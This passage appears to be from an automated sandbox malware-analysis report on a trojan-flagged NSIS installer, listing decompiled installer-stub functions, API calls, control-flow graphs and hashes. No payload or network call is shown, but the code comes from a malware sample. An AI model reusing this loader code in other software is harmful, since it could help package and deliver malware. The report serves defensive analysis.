										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                    0x004040d0
                                                                                    0x004040d7
                                                                                    0x0040423e
                                                                                    0x00404242
                                                                                    0x00404246
                                                                                    0x00404248
                                                                                    0x0040424d
                                                                                    0x00404258
                                                                                    0x00404263
                                                                                    0x00404268
                                                                                    0x0040426a
                                                                                    0x0040426c
                                                                                    0x0040426f
                                                                                    0x00404274
                                                                                    0x00404282
                                                                                    0x0040428f
                                                                                    0x00404296
                                                                                    0x00404296
                                                                                    0x00404297
                                                                                    0x00404297
                                                                                    0x0040429c
                                                                                    0x004042a2
                                                                                    0x004042a9
                                                                                    0x004042af
                                                                                    0x004042b1
                                                                                    0x004042f1
                                                                                    0x004042f6
                                                                                    0x004042fb
                                                                                    0x004042fb
                                                                                    0x00404300
                                                                                    0x00404309
                                                                                    0x0040430b
                                                                                    0x00404310
                                                                                    0x00404316
                                                                                    0x0040431a
                                                                                    0x0040431a
                                                                                    0x0040431f
                                                                                    0x00404325
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404330
                                                                                    0x00404336
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040433f
                                                                                    0x00404347
                                                                                    0x0040434c
                                                                                    0x0040434f
                                                                                    0x00404355
                                                                                    0x0040435a
                                                                                    0x0040435d
                                                                                    0x00404363
                                                                                    0x00404368
                                                                                    0x0040436b
                                                                                    0x00404371
                                                                                    0x00404379
                                                                                    0x0040437f
                                                                                    0x00404385
                                                                                    0x00404389
                                                                                    0x00404390
                                                                                    0x00404390
                                                                                    0x00404390
                                                                                    0x0040439a
                                                                                    0x004043ac
                                                                                    0x004043b8
                                                                                    0x004043bd
                                                                                    0x004043c7
                                                                                    0x004043cd
                                                                                    0x004043cf
                                                                                    0x004043d4
                                                                                    0x004043d1
                                                                                    0x004043d1
                                                                                    0x004043d1
                                                                                    0x004043e4
                                                                                    0x004043fc
                                                                                    0x004043fe
                                                                                    0x00404404
                                                                                    0x00404419
                                                                                    0x00404406
                                                                                    0x0040440f
                                                                                    0x00404411
                                                                                    0x00404411
                                                                                    0x0040441f
                                                                                    0x00404430
                                                                                    0x00404446
                                                                                    0x0040444d
                                                                                    0x00404457
                                                                                    0x0040445c
                                                                                    0x0040445e
                                                                                    0x00000000
                                                                                    0x00404464
                                                                                    0x00404464
                                                                                    0x00404466
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040446c
                                                                                    0x00404470
                                                                                    0x00404495
                                                                                    0x0040449b
                                                                                    0x004044a1
                                                                                    0x004044a3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044c9
                                                                                    0x004044cf
                                                                                    0x004044d1
                                                                                    0x004044d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044dc
                                                                                    0x004044df
                                                                                    0x004044e2
                                                                                    0x004044f9
                                                                                    0x00404505
                                                                                    0x0040451e
                                                                                    0x00404528
                                                                                    0x0040452d
                                                                                    0x00404533
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040453d
                                                                                    0x00404548
                                                                                    0x00000000
                                                                                    0x00404548
                                                                                    0x00404472
                                                                                    0x00404478
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040447e
                                                                                    0x00404484
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040448a
                                                                                    0x0040445e
                                                                                    0x00404555
                                                                                    0x00404561
                                                                                    0x00404568
                                                                                    0x00000000
                                                                                    0x004042b3
                                                                                    0x004042b3
                                                                                    0x004042b6
                                                                                    0x004042e9
                                                                                    0x004042e9
                                                                                    0x004042eb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042eb
                                                                                    0x004042bc
                                                                                    0x004042c1
                                                                                    0x004042c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042d3
                                                                                    0x004042db
                                                                                    0x00000000
                                                                                    0x004042e1
                                                                                    0x004040e9
                                                                                    0x004040e9
                                                                                    0x004040ed
                                                                                    0x004040f2
                                                                                    0x00404101
                                                                                    0x00404101
                                                                                    0x00404107
                                                                                    0x0040410e
                                                                                    0x00404152
                                                                                    0x00404158
                                                                                    0x00404171
                                                                                    0x00404174
                                                                                    0x00404187
                                                                                    0x0040418d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404193
                                                                                    0x0040419e
                                                                                    0x004041a0
                                                                                    0x004041a2
                                                                                    0x004041c1
                                                                                    0x004041c1
                                                                                    0x004041c4
                                                                                    0x004041c9
                                                                                    0x004041cc
                                                                                    0x004041dc
                                                                                    0x004041dd
                                                                                    0x004041df
                                                                                    0x00404215
                                                                                    0x00404225
                                                                                    0x00000000
                                                                                    0x00404225
                                                                                    0x004041e1
                                                                                    0x004041e7
                                                                                    0x00404200
                                                                                    0x00404205
                                                                                    0x00404207
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404209
                                                                                    0x004041f5
                                                                                    0x004041f5
                                                                                    0x004041f7
                                                                                    0x004041f7
                                                                                    0x00000000
                                                                                    0x004041f7
                                                                                    0x004041ea
                                                                                    0x004041ef
                                                                                    0x00000000
                                                                                    0x004041ef
                                                                                    0x004041ce
                                                                                    0x004041d4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004041d6
                                                                                    0x00000000
                                                                                    0x004041d6
                                                                                    0x004041c6
                                                                                    0x00000000
                                                                                    0x004041c6
                                                                                    0x004041ac
                                                                                    0x004041b3
                                                                                    0x004041b9
                                                                                    0x004041bb
                                                                                    0x00404591
                                                                                    0x00000000
                                                                                    0x00404591
                                                                                    0x00000000
                                                                                    0x004041bb
                                                                                    0x00404179
                                                                                    0x00000000
                                                                                    0x00404181
                                                                                    0x00404160
                                                                                    0x00404166
                                                                                    0x0040456e
                                                                                    0x00404574
                                                                                    0x00404581
                                                                                    0x00404587
                                                                                    0x00404587
                                                                                    0x00000000
                                                                                    0x00404110
                                                                                    0x00404115
                                                                                    0x00404121
                                                                                    0x0040412a
                                                                                    0x0040422b
                                                                                    0x00000000
                                                                                    0x00404149
                                                                                    0x0040414c
                                                                                    0x00000000
                                                                                    0x0040414c
                                                                                    0x0040412a
                                                                                    0x0040410e

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                    • ShowWindow.USER32(?), ref: 00404121
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                    • DestroyWindow.USER32 ref: 00404160
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                    • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID: H7B
                                                                                    • API String ID: 121052019-2300413410
                                                                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->314 311->310 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 321 403dd7-403dff call 406536 320->321 321->319 328 403e01-403e05 321->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 345 403f26-403f31 call 403fed 330->345 346 403f1e-403f21 330->346 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 344 403e35-403e3f GetFileAttributesW 339->344 340->319 349 403e41-403e43 344->349 350 403e45-403e46 call 405f83 344->350 354 403f37-403f51 ShowWindow call 4069c5 345->354 355 403fba-403fbb call 40579d 345->355 346->338 349->340 349->350 350->340 362 403f53-403f58 call 4069c5 354->362 363 403f5d-403f6f GetClassInfoW 354->363 358 403fc0-403fc2 355->358 360 403fc4-403fca 358->360 361 403fdc-403fde call 40140b 358->361 360->346 364 403fd0-403fd7 call 40140b 360->364 361->334 362->363 367 403f71-403f81 GetClassInfoW RegisterClassW 363->367 368 403f87-403faa DialogBoxParamW call 40140b 363->368 364->346 367->368 372 403faf-403fb8 call 403c67 368->372 372->338
                                                                                    C-Code - Quality: 96%
                                                                                    			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                    0x00403d1d
                                                                                    0x00403d26
                                                                                    0x00403d2d
                                                                                    0x00403d2f
                                                                                    0x00403d43
                                                                                    0x00403d55
                                                                                    0x00403d5e
                                                                                    0x00403d67
                                                                                    0x00403d6e
                                                                                    0x00403d73
                                                                                    0x00403d7a
                                                                                    0x00403d8d
                                                                                    0x00403d8d
                                                                                    0x00403d98
                                                                                    0x00403d31
                                                                                    0x00403d3c
                                                                                    0x00403d3c
                                                                                    0x00403d9d
                                                                                    0x00403da7
                                                                                    0x00403db0
                                                                                    0x00403db5
                                                                                    0x00403dc6
                                                                                    0x00403e58
                                                                                    0x00403e60
                                                                                    0x00403e69
                                                                                    0x00403e69
                                                                                    0x00403e7f
                                                                                    0x00403e85
                                                                                    0x00403e93
                                                                                    0x00403f14
                                                                                    0x00403f1c
                                                                                    0x00403f26
                                                                                    0x00403f2b
                                                                                    0x00403f31
                                                                                    0x00403fbb
                                                                                    0x00403fc0
                                                                                    0x00403fc2
                                                                                    0x00403fde
                                                                                    0x00000000
                                                                                    0x00403fde
                                                                                    0x00403fc4
                                                                                    0x00403fca
                                                                                    0x00403fd2
                                                                                    0x00403fd2
                                                                                    0x00000000
                                                                                    0x00403fca
                                                                                    0x00403f3f
                                                                                    0x00403f4a
                                                                                    0x00403f4f
                                                                                    0x00403f51
                                                                                    0x00403f58
                                                                                    0x00403f58
                                                                                    0x00403f63
                                                                                    0x00403f6b
                                                                                    0x00403f6d
                                                                                    0x00403f6f
                                                                                    0x00403f78
                                                                                    0x00403f7b
                                                                                    0x00403f81
                                                                                    0x00403f81
                                                                                    0x00403fa0
                                                                                    0x00403fb1
                                                                                    0x00000000
                                                                                    0x00403fb6
                                                                                    0x00403f1e
                                                                                    0x00403f20
                                                                                    0x00000000
                                                                                    0x00403e95
                                                                                    0x00403e95
                                                                                    0x00403ea1
                                                                                    0x00403eab
                                                                                    0x00403eb1
                                                                                    0x00403eb6
                                                                                    0x00403ec5
                                                                                    0x00403fe3
                                                                                    0x00403fe3
                                                                                    0x00000000
                                                                                    0x00403fe3
                                                                                    0x00403ed4
                                                                                    0x00403f0f
                                                                                    0x00000000
                                                                                    0x00403f0f
                                                                                    0x00403dcc
                                                                                    0x00403dcc
                                                                                    0x00403dcf
                                                                                    0x00403dd1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403ddf
                                                                                    0x00403df1
                                                                                    0x00403df6
                                                                                    0x00403dff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e05
                                                                                    0x00403e07
                                                                                    0x00403e14
                                                                                    0x00403e14
                                                                                    0x00403e1d
                                                                                    0x00403e23
                                                                                    0x00403e4b
                                                                                    0x00403e53
                                                                                    0x00000000
                                                                                    0x00403e35
                                                                                    0x00403e36
                                                                                    0x00403e3f
                                                                                    0x00403e45
                                                                                    0x00403e46
                                                                                    0x00000000
                                                                                    0x00403e46
                                                                                    0x00403e41
                                                                                    0x00403e43
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e43
                                                                                    0x00403e23

                                                                                    APIs
                                                                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75213420), ref: 00403E18
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                    • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F
                                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                    • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                    • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                    • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-1664645273
                                                                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 380 40336a-40336e 378->380 387 403243-403251 call 40302e 379->387 388 40315e 379->388 394 403322-403327 387->394 395 403257-40325a 387->395 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 401 40318d-403194 393->401 402 4032de-4032e6 call 40302e 393->402 394->380 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 395->397 398 40325c-403274 call 4035f8 call 4035e2 395->398 426 4032d4-4032d9 397->426 427 4032e8-403318 call 4035f8 call 403371 397->427 398->394 421 40327a-403280 398->421 406 403210-403214 401->406 407 403196-4031aa call 406113 401->407 402->394 411 403216-40321d call 40302e 406->411 412 40321e-403224 406->412 407->412 424 4031ac-4031b3 407->424 411->412 417 403233-40323b 412->417 418 403226-403230 call 406b22 412->418 417->390 425 403241 417->425 418->417 421->394 421->397 424->412 430 4031b5-4031bc 424->430 425->387 426->380 436 40331d-403320 427->436 430->412 432 4031be-4031c5 430->432 432->412 434 4031c7-4031ce 432->434 434->412 435 4031d0-4031f0 434->435 435->394 437 4031f6-4031fa 435->437 436->394 438 403329-40333a 436->438 439 403202-40320a 437->439 440 4031fc-403200 437->440 441 403342-403347 438->441 442 40333c 438->442 439->412 443 40320c-40320e 439->443 440->425 440->439 444 403348-40334e 441->444 442->441 443->412 444->444 445 403350-403368 call 406113 444->445 445->380
                                                                                    C-Code - Quality: 99%
                                                                                    			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					__eflags =  *0x42a274 - _t94;
					if( *0x42a274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
									__eflags =  *0x42a27c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x1c1bac
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x42a280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a274;
						if( *0x42a274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
